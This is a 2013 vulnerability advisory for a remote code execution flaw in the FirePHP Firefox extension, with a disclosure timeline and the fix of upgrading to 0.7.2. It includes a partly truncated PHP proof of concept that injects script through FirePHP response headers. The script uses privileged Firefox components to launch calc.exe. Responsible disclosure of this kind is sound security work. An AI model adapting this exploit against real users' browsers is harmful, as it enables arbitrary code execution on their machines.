-------------------------------------------------------------------------------------------- 20130417 - Justanotherhacker.com : FirePHP firefox plugin remote code execution JAHx132 - http://www.justanotherhacker.com/advisories/JAHx132.txt -------------------------------------------------------------------------------------------- FirePHP enables you to log to your Firebug Console using a simple PHP method call. All data is sent via response headers and will not interfere with the content on your page. FirePHP is ideally suited for AJAX development where clean JSON and XML responses are required. [ Taken from: http://www.firephp.org/ ] --- Vulnerability description --- The extension does not sufficiently validate cell names in array data received from the remote host resulting in arbitrary script execution in the chrome privileged context if a user inspects the malicious data in firephp. Discovered by: Eldar "Wireghoul" Marcussen Type: Remote Code Execution Severity: High Release: Responsible Vendor: FirePHP - http://www.firephp.org/ Affected versions: All versions prior to 0.7.2 --- Proof of Concept --- '; $exploit.= 'var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);'; $exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");'; $exploit.= 'var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);'; $exploit.= 'process.init(lFile);'; $exploit.= 'process.run(true,[],0);void(0);'; $exploit.= '<\/SCRIPT>":"PWNT"}}'; // Send FirePHP dump data header("X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2"); header("X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3"); header("X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1"); $payload= "X-Wf-1-1-1-1: "; $payload.= strlen($exploit).'|'.$exploit."|\r\n"; header($payload); ?> FirePHP Firefox plugin RCE PoC PWNT! --- Solution --- Upgrade to version 0.7.2 --- Disclosure time line --- 17-Apr-2013 - Public disclosure 17-Apr-2013 - New version available via mozilla addons 12-Apr-2013 - New version 12-Apr-2013 - Vendor acknowledge vulnerability 09-Apr-2013 - Vendor notified through email